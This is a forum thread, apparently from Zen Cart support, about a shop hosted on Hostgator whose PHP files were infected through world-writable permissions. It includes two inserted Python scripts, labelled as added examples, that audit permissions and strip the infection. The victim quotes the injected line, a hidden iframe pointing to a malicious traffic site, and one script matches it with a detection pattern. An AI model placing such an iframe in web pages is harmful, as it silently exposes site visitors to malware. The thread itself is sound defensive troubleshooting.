Exactly Kim - and I've been telling them just that until I'm blue in the face! If you look at the copies of the messages above that have been flying between me and Hostgator you'll see what I mean.
G
I doubt you'll get any further with Hostgator.
1. Zen Cart is clean
2. Your customized files got exploited due to folder permissions.
3. Zen Cart suggests those folders be chmod 777 for editing purposes, and our security docs recommend downgrading that to 644 or so once your content is up-to-date and static.
4. Our security docs also recommend the use of further .htaccess files in sensitive places if you feel the need, with some examples.
5. We cannot and will not anticipate how effectively each host's configuration will operate vis a vis security issues; all we can do is provide guidelines.
Whether further .htaccess files would have protected you in this case is unknown... and only a minimal likelihood.
It's the 777 that left you vulnerable to whatever someone else on the server was doing. I suspect some blog or forum software in someone else's account got hacked, and from there, the hacker ran a program to scan folders and look for writable files, and then replicated its content.
Your host could implement open_basedir restrictions to help guard against that.
But, that's up to them and how seriously they take security concerns.
Your part is just to close the door to your files... chmod...
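An added example, not part of the original post or of Zen Cart: a Python audit that lists every file and folder still writable by group or other, and optionally tightens them. The 644 file mode comes from the thread; the 755 directory mode and the function names are assumptions.

```python
import os
import stat
import sys

FILE_MODE = 0o644  # mode recommended in the thread for static files
DIR_MODE = 0o755   # assumption: directories keep the execute bit so they stay traversable
LOOSE_BITS = stat.S_IWGRP | stat.S_IWOTH  # writable by group or by everyone


def find_loose(root):
    """Return sorted (path, current_mode, target_mode) tuples for every entry
    under root that someone other than the owner can write to."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # never chmod through a symlink
            mode = stat.S_IMODE(st.st_mode)
            if mode & LOOSE_BITS:
                target = DIR_MODE if stat.S_ISDIR(st.st_mode) else FILE_MODE
                findings.append((path, mode, target))
    return sorted(findings)


def tighten(root, apply=False):
    """Report loose entries; change their modes only when apply is True."""
    findings = find_loose(root)
    if apply:
        for path, _mode, target in findings:
            os.chmod(path, target)
    return findings


if __name__ == "__main__":
    # Usage: python tighten.py <folder> [--apply]
    for path, mode, target in tighten(sys.argv[1], "--apply" in sys.argv[2:]):
        print(f"{mode:04o} -> {target:04o}  {path}")
```

Run it without --apply first to see what would change; files that Zen Cart must write to during editing will need their mode raised again temporarily.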
Yes it's becoming as clear as day what has happened. The CHMOD 777 was open on certain files because I was in the process of setting the damned thing up. I'm still seething with Hostgator. I'm not prepared to let go of the bone that easily. They need to come up with answers and not fob-offs, if they came clean it would be easier to accept. It's obvious to me that there's an exploit file running wild on their servers, and as far as I'm concerned that's their security liability, they should have to answer for it.
The other problem is the hassle of changing hosts. I've got quite a few sites with them and I was lining up a Reseller account with them. I really could do without this!!!
Thanks Doc - you've been a great help.
G
I think that Big Gee knows that it's not Zen Cart - it's HostGator who are busy trying to pass the buck.
Vger
That's right Vger - it's either I'm not expressing myself well enough for others to understand or Kim's parrot is squawking so loudly she can't hear herself reading!!
Absolutely no problem with ZC (and I never suggested there was), in fact I've been sweating pints fighting ZC's corner after Hostgator started shifting the blame in that direction.
Thanks,
G
The irresponsibility of many of these big-name hosts sickens me to no end. Whether it be overloaded servers, hijacked servers, or ****ty customer service they never take responsibility for problems that arise on their end. All they care about is that next monthly payment. The worst part is they have so many customers that if you leave them it really doesn't matter.
My advice, again, would be to switch hosts. There are other good ones out there with referral programs. Second, get on some forums and host review sites and let Hostgator know you're not just another naive cash flow opportunity.
Make regular site and database backups!
Yes I know, but they are sensitive about bad publicity that CAN hurt. On the bright side I got the big "climb down" today (see a copy below). However this is only the start - they now need to get their act together to convince me they're going to do something about their security. By default certain files have to have "write" attributes to work correctly. Everyone should be able to work in an environment where the host company can be trusted to protect people up to a reasonable standard in those circumstances - at present Hostgator obviously don't.
I'll keep you posted.
Regards,
G
Gwilym,
You are correct that there could in fact be a script located on the server hunting for writeable scripts; however, at this time we're unable to find one.
I'd highly recommend following the advice in the thread you've posted.
The specific one is:
DannoUK - what's almost certainly happened is this:
A malicious script has been set loose on the webhosts server.
That script searches for files that it can write to.
Such files are usually theme files.
This is not WP hacking as much a combination of a webhost security and your file permissions.
Download your current theme.
Go through each file in that theme checking for the garbage code.
Delete it all obviously
Upload the files and then change their permissions to 644 and NO higher. No 664 / 666 or anything else.
Check the site works.
If not, check your file editing.
You cannot now edit files online.
NO files on a site should ever be writable and if they are you must know where, why and the risks.
Let us know if you have any further questions or concerns.
Dave M.
Hostgator Customer Support
Be persistent like herpes until they resolve the situation.
I've just downloaded the whole of my ZC files from my host's server to a folder on my PC. I've checked a few PHP files in the html_includes folder and every one seems to be infected with this rogue line of coding:
<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>
I now have three choices:
1. Sit down for hours going through each and every file and manually removing the above line when found.
2. Deleting the whole file-set and starting again
or
3. Getting my hands on some editing software that will scan each and every file in the downloaded "suspect" files folder and then either delete or replace the spurious line with one command.
Does anyone know of such a piece of software kit? I've got Winmerge but from what I can see of that (good as it seems) it only allows you to open a selected file in one pane and then compares it to another selected file of your choice in a second pane and then allows you to merge any changes into one resulting file. Doing that will take longer than opening each file in a text editor and using the "replace" edit function to delete the iframe string.
Can someone help?
G
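An added example, not part of the original post: a Python script that does what option 3 asks for, walking the downloaded folder and removing the injected iframe quoted above from every file that contains it. The script and function names are assumptions; it only reports what it finds unless --apply is given.

```python
import os
import re
import sys

# The injected tag as quoted in the post, matched loosely enough to survive
# reordered attributes or extra whitespace. Other iframes are left alone.
INJECTED = re.compile(
    rb'<iframe\b[^>]*\bsrc\s*=\s*["\']?http://step57\.info/[^>]*>\s*</iframe>',
    re.IGNORECASE,
)


def clean_tree(root, apply=False):
    """Return {path: number_of_injected_tags}. Files are read as bytes so the
    character encoding of each file is preserved; they are rewritten only
    when apply is True."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            cleaned, count = INJECTED.subn(b"", data)
            if count:
                results[path] = count
                if apply:
                    with open(path, "wb") as fh:
                        fh.write(cleaned)
    return results


if __name__ == "__main__":
    # Usage: python clean_iframe.py <folder> [--apply]
    found = clean_tree(sys.argv[1], "--apply" in sys.argv[2:])
    for path, count in sorted(found.items()):
        print(f"{count} injected tag(s): {path}")
    print(f"{len(found)} file(s) affected")
```

Running it a second time after --apply should report 0 files affected; anything it still lists was not writable or changed again in the meantime.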
Get the files from our get Zen Cart link at the top of the page ...
It sounds like whatever you are using to install has a serious problem that you should make your hosting site aware of ...
That is not part of the original Zen Cart ...
If you download from here and upload those files and that shows up again ... then there is a more serious issue happening that needs to be addressed ...
Linda McGrath